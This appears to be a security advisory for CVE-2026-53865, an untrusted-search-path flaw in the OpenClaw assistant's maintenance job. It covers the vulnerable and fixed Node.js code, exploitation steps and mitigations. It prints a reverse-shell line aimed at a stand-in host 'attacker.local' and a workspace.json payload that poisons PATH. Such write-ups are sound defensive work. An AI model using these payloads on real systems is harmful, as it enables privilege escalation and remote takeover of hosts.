CVE-2026-53865: Arbitrary Local Command Execution in OpenClaw via Untrusted Search Path

OpenClaw is designed as a local-first AI assistant requiring tight integration with host file systems and native utilities. To ensure optimal file storage, OpenClaw features automated maintenance procedures that run periodically or are invoked manually by administrators. These tasks process and clear temporary files, cached execution nodes, and user configuration backups. To prevent standard, irreversible system deletion, the cleanup routines invoke the 'trash' system utility to securely move unnecessary objects to the recycling area.

The core of the vulnerability lies in how OpenClaw configures workspace-derived execution environments. Workspace properties are managed using dedicated settings files, which can include customized environment variables intended to help user-defined tasks and integration wrappers locate local system resources. However, OpenClaw does not isolate administrative cleanup operations from these workspace configurations.

When a maintenance task is executed, the application dynamically generates a process environment containing the workspace-specific modifications. Because this environment is derived from user-controlled workspace properties, an attacker who is a local user or has access to change the workspace structure can append paths to the system execution path. This behavior exposes a critical attack surface, resulting in untrusted path resolution.

The root cause of CVE-2026-53865 is a CWE-426 (Untrusted Search Path) weakness in the maintenance module of OpenClaw. When spawning system-level child processes, Node.js applications use the child_process module's execution APIs, such as spawn or exec. These APIs accept an optional options object that specifies an env payload. If no env payload is defined, Node.js defaults to the current system environment variables process.env.

In affected versions of OpenClaw, the process creation mechanism merges the global process.env with an array of key-value pairs parsed from the workspace's local configurations. This merge process prepends or appends custom directory entries to the PATH environment variable. When the maintenance routine schedules a run, it issues an execution request for the default cleanup utility, which relies on the operating system's resolution mechanism to find the command.

Because the workspace configuration is parsed directly into the child process's execution context, the host operating system performs binary resolution using the polluted PATH variable first. If the PATH contains an attacker-controlled directory at the front of the list, the system locates and executes the binary located inside that directory instead of the standard executable in system paths such as /usr/bin or /bin.

The vulnerability is demonstrated by looking at the logical flaw in how the system task runner processes the local workspace properties prior to spawning child processes.

// VULNERABLE CODE PATH
const cp = require('child_process');
const fs = require('fs');
const path = require('path');
 
function runMaintenanceJob(workspaceDir, filesToPurge) {
    // Extract workspace configuration settings
    const configPath = path.join(workspaceDir, 'workspace.json');
    const rawConfig = fs.readFileSync(configPath, 'utf8');
    const config = JSON.parse(rawConfig);
 
    // VULNERABLE: Direct merging of untrusted environment variables
    const mergedEnv = {
        ...process.env,
        ...config.customEnv
    };
 
    // VULNERABLE: Invoking a system command without utilizing an absolute path
    // If customEnv modifies PATH, Node.js resolves 'trash' using the modified environment
    const processTask = cp.spawn('trash', filesToPurge, {
        env: mergedEnv,
        shell: true
    });
}

The fix implementation resolves this by separating the environment context of local workspace commands from core administrative operations. It also enforces absolute path resolution for system utilities.

// SECURED CODE PATH
const cp = require('child_process');
const path = require('path');
 
function runMaintenanceJobSecured(workspaceDir, filesToPurge) {
    // Hardcode or resolve the absolute path to the system utility securely
    const trustedUtilityPath = process.platform === 'win32' 
        ? 'C:\\Windows\\System32\\recycle.exe' 
        : '/usr/bin/trash-put';
 
    // Create a fully sanitized environment object
    const sanitizedEnv = { ...process.env };
 
    // Explicitly restrict PATH to trusted directories only
    sanitizedEnv.PATH = process.platform === 'win32' 
        ? 'C:\\Windows\\System32;C:\\Windows' 
        : '/usr/bin:/bin:/usr/sbin:/sbin';
 
    // Execute using the absolute path with shell evaluation disabled
    const processTask = cp.spawn(trustedUtilityPath, filesToPurge, {
        env: sanitizedEnv,
        shell: false
    });
}

Exploitation requires an attacker to have local write access to an active workspace directory or the ability to influence its environment settings. The configuration can be modified via an integrated JSON workspace profile or an external .env file depending on deployment parameters.

An attacker begins by creating a local directory within a writable space, such as /tmp/attack_vector. Inside this folder, the attacker places a compiled binary or script named trash. This payload contains the instructions to execute within the target service context.

# Example of an attacker-crafted script located in /tmp/attack_vector/trash
#!/bin/sh
/bin/bash -c "bash -i >& /dev/tcp/attacker.local/4444 0>&1"

Once the payload is ready and executable, the attacker modifies the local workspace.json config settings or relevant environmental directives inside the workspace folder:

{
  "workspaceName": "Default Project",
  "customEnv": {
    "PATH": "/tmp/attack_vector:/usr/bin:/bin"
  }
}

When a standard maintenance cycle is triggered automatically or started manually, the OpenClaw service scans the workspace files, merges the environment variables, and executes the cleanup function. The operating system references /tmp/attack_vector first, resulting in the execution of the attacker's trash script rather than the system-wide tool.

Successful exploitation of CVE-2026-53865 leads to local privilege escalation. Because OpenClaw is designed to manage various local storage drives and external service instances, its administrative worker services are often configured with elevated system-level permissions. If a service runs under a specialized administrative user or as root, any commands executed via the untrusted search path vulnerability will run with those same high-level system permissions.

This vulnerability breaks local multi-tenant boundaries. In environments where multiple developers or automated systems share a single OpenClaw Gateway deployment, low-privileged workspace contributors can escalate their privileges to compromise the underlying system.

The threat model of the system also affects local networks, as compromised assistants can expose credentials, session cookies, database schemas, and AI models stored in memory.

Administrators must deploy updated binaries to resolve the path injection issue. OpenClaw release 2026.5.2 restricts environment merging and forces absolute paths for system execution contexts. If utilizing specific OS distributions, administrators should update deployments to version 2026.5.26 to address all beta-channel configurations.

If manual patching is not immediately feasible, deploy the following workarounds to reduce risk:

• Restrict Directory Permissions: Ensure that OpenClaw workspace folders and configuration files are writable only by their respective administrative users.
• Process Containment: Implement container-level isolation using Docker, gVisor, or systemd sandboxes with restricted system calls and minimal permissions.
• Path Sanitization Wrapper: Prepend clean system path variables at the shell level prior to launching the main OpenClaw gateway daemon.

# Restrict daemon executions inside systemd units by locking down path properties:
[Service]
Environment="PATH=/usr/bin:/bin:/usr/sbin:/sbin"